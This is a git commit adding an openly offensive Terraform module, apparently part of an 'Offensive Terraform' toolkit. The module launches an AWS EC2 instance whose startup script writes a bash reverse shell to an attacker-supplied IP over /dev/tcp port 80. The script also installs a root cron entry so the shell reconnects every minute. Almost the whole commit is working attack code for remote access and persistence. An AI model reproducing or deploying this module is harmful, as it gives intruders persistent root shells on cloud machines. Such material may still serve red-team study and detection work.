Create EC2 instance reverse shell module

iganbold · iganbold · commit c7b0e9334048 · 2020-09-05T23:48:51.000-07:00
diff --git a/main.tf b/main.tf
@@ -0,0 +1,23 @@
+terraform {
+  required_version = ">= 0.12"
+}
+
+resource "aws_instance" "this" {
+  ami                         = "ami-06b263d6ceff0b3dd"
+  instance_type               = "t2.micro"
+  subnet_id                   = var.subnet_id
+  user_data                   = data.template_file.user_data.rendered
+  associate_public_ip_address = true
+
+  tags = {
+    CreatedBy = "Offensive Terraform"
+  }
+}
+
+data "template_file" "user_data" {
+  template = file(".terraform/modules/ec2-instance-reverse-shell/payload.sh")
+
+  vars = {
+    attacker_ip = var.attacker_ip
+  }
+}
diff --git a/outputs.tf b/outputs.tf
@@ -0,0 +1,15 @@
+output "aws_instance_id" {
+  value = aws_instance.this.*.id
+}
+
+output "aws_instance_public_ip" {
+  value = aws_instance.this.*.public_ip
+}
+
+output "aws_instance_private_ip" {
+  value = aws_instance.this.*.private_ip
+}
+
+output "aws_instance_user_data" {
+  value = aws_instance.this.*.user_data
+}
diff --git a/payload.sh b/payload.sh
@@ -0,0 +1,5 @@
+#! /bin/bash
+echo '#! /bin/bash' >> /hack.sh
+echo 'bash -i >& /dev/tcp/${attacker_ip}/80 0>&1' >> /hack.sh
+
+echo '* * * * * root bash /hack.sh' >> /etc/crontab && echo "" >> /etc/crontab
diff --git a/variables.tf b/variables.tf
@@ -0,0 +1,9 @@
+variable "subnet_id" {
+  type        = string
+  description = "The VPC Subnet ID to launch in."
+}
+
+variable "attacker_ip" {
+  type        = string
+  description = "The attacker IP to reverse shell from AWS EC2 instance."
+}
